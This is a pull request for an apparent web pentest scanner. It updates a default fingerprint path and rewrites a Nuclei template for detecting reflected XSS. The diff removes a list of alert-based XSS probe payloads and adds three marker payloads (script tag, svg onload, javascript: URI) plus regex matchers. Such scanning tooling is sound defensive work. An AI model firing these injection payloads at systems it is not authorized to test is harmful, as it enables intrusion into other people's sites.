### PR TITLE
Update static asset takeover path and simplify XSS payloads

### DIFF
--- a/cmd/pentest.go
+++ b/cmd/pentest.go
@@ -540,7 +540,7 @@ func (a *WebScan) InitPentestCommand() {
 	// Target Flags
 	pentestRouteStaticAssetTakeoverCmd.Flags().String("target", "", "URL target to analyze for static asset takeover")
 	// Config Flags
-	pentestRouteStaticAssetTakeoverCmd.Flags().StringSlice("fingerprint-file-paths", []string{"configs/discover/route/static_asset_takeover.json"}, "Paths to fingerprint definition files")
+	pentestRouteStaticAssetTakeoverCmd.Flags().StringSlice("fingerprint-file-paths", []string{"/opt/method/webscan/var/conf/pentest/route/static_asset_takeover.json"}, "Paths to fingerprint definition files")
 	pentestRouteStaticAssetTakeoverCmd.Flags().Bool("require-base-url-match", false, "Only scan assets sharing the target's base URL")
 	pentestRouteStaticAssetTakeoverCmd.Flags().Bool("successful-only", false, "Only show successful takeover attempts")
 	pentestRouteStaticAssetTakeoverCmd.Flags().Int("max-redirects", 10, "Maximum number of redirects to follow")

--- a/utils/nuclei/templates/pentest/dast/xss/xss-reflect.yaml
+++ b/utils/nuclei/templates/pentest/dast/xss/xss-reflect.yaml
@@ -8,26 +8,9 @@ info:
 http:
   - payloads:
       injection:
-        - "<script>alert('XSS')</script>"
-        - '<img src=''x'' onerror=''alert("XSS")''>'
-        - '<a href=''javascript:alert("XSS")''>Click me</a>'
-        - '<button onclick=''alert("XSS")''>Click me</button>'
-        - '"><svg onload=alert(''XSS'')>'
-        - "'-alert('XSS')-'"
-        - '<iframe src=''javascript:alert("XSS")''></iframe>'
-        - "<body onload=alert('XSS')>"
-        - "<input type='text' value='XSS' onfocus=alert('XSS') autofocus>"
-        - "<select onchange=alert('XSS')><option>XSS</option></select>"
-        - "<textarea oninput=alert('XSS')>XSS</textarea>"
-        - '<embed src=''data:text/html,<script>alert("XSS")</script>''>'
-        - '<object data=''javascript:alert("XSS")''></object>'
-        - "<form onsubmit=alert('XSS')><input type='submit'></form>"
-        - "<video src=x onerror=alert('XSS')>"
-        - "<audio src=x onerror=alert('XSS')>"
-        - "<details open ontoggle=alert('XSS')><summary>XSS</summary></details>"
-        - "<marquee onstart=alert('XSS')>XSS</marquee>"
-        - '<form action=''javascript:alert("XSS")''><input type=''submit''></form>'
-        - '<iframe src=''javascript:alert("XSS")''></iframe>'
+        - '"><script>alert("gasdasd")</script>'
+        - '"><svg/onload=alert("gasdasd")>'
+        - 'javascript:alert("gasdasd")'
     fuzzing:
       - part: request
         type: replace
@@ -40,11 +23,19 @@ http:
     stop-at-first-match: true
     matchers-condition: or
     matchers:
-      - type: word
+      - type: regex
         part: body
-        words:
-          - "alert('XSS')"
-      - type: word
-        part: headers
-        words:
-          - "alert('XSS')"
+        regex:
+          - "(?i)<script[^>]*>[^<]*gasdasd[^<]*</script>"
+
+      # 2) inline event handler: onload=“…{{marker}}…”, onclick='…'
+      - type: regex
+        part: body
+        regex:
+          - "(?i)on[a-z]+\\s*=\\s*[\"'][^>]*gasdasd[^>]*[\"']"
+
+      # 3) javascript: URI containing the marker
+      - type: regex
+        part: body
+        regex:
+          - '(?i)javascript:[^"''<>]*gasdasd'


### PR DESCRIPTION
# Update static asset takeover path and refine XSS detection template

- Update the default fingerprint file path for static asset takeover to use the production path `/opt/method/webscan/var/conf/pentest/route/static_asset_takeover.json`
- Simplify XSS reflection payloads to focus on three effective patterns
- Improve XSS detection with regex matchers that target specific injection patterns:
  - Script tag content
  - Event handlers
  - JavaScript URIs